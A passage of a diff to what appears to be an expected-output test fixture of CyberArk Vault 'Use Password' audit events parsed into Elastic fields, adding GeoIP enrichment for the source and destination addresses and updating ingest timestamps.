\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:12\",\"IsoTimestamp\":\"2021-03-11T17:38:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -199,10 +208,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -274,7 +292,7 @@ "event": { "severity": 2, "reason": "FOR FUN.", - "ingested": "2021-12-09T13:36:52.374498300Z", + "ingested": "2021-12-14T14:42:18.814509792Z", "original": "\u003c5\u003e1 2021-03-11T17:46:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFOR FUN.\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:49\",\"IsoTimestamp\":\"2021-03-11T17:46:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"FOR FUN.\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -298,10 +316,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -373,7 +400,7 @@ "event": { "severity": 2, "reason": "For fun and profit", - "ingested": "2021-12-09T13:36:52.374504300Z", + "ingested": "2021-12-14T14:42:18.814510259Z", "original": "\u003c5\u003e1 2021-03-11T17:48:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eFor fun and profit\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:27\",\"IsoTimestamp\":\"2021-03-11T17:48:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"For fun and profit\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -397,10 +424,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -472,7 +508,7 @@ "event": { "severity": 2, "reason": "Because I say so", - "ingested": "2021-12-09T13:36:52.374510200Z", + "ingested": "2021-12-14T14:42:18.814510641Z", "original": "\u003c5\u003e1 2021-03-11T17:54:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eBecause I say so\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:49\",\"IsoTimestamp\":\"2021-03-11T17:54:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Because I say so\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -496,10 +532,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -571,7 +616,7 @@ "event": { "severity": 2, "reason": "for fun", - "ingested": "2021-12-09T13:36:52.374516Z", + "ingested": "2021-12-14T14:42:18.814511023Z", "original": "\u003c5\u003e1 2021-03-11T17:56:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003efor fun\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:30\",\"IsoTimestamp\":\"2021-03-11T17:56:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"for fun\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -595,10 +640,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -670,7 +724,7 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-12-09T13:36:52.374522Z", + "ingested": "2021-12-14T14:42:18.814511423Z", "original": "\u003c5\u003e1 2021-03-11T20:23:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003etesting\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:17\",\"IsoTimestamp\":\"2021-03-11T20:23:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -694,17 +748,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -772,7 +844,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:52.374527900Z", + "ingested": "2021-12-14T14:42:18.814511876Z", "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" 
Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", @@ -797,17 +869,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + 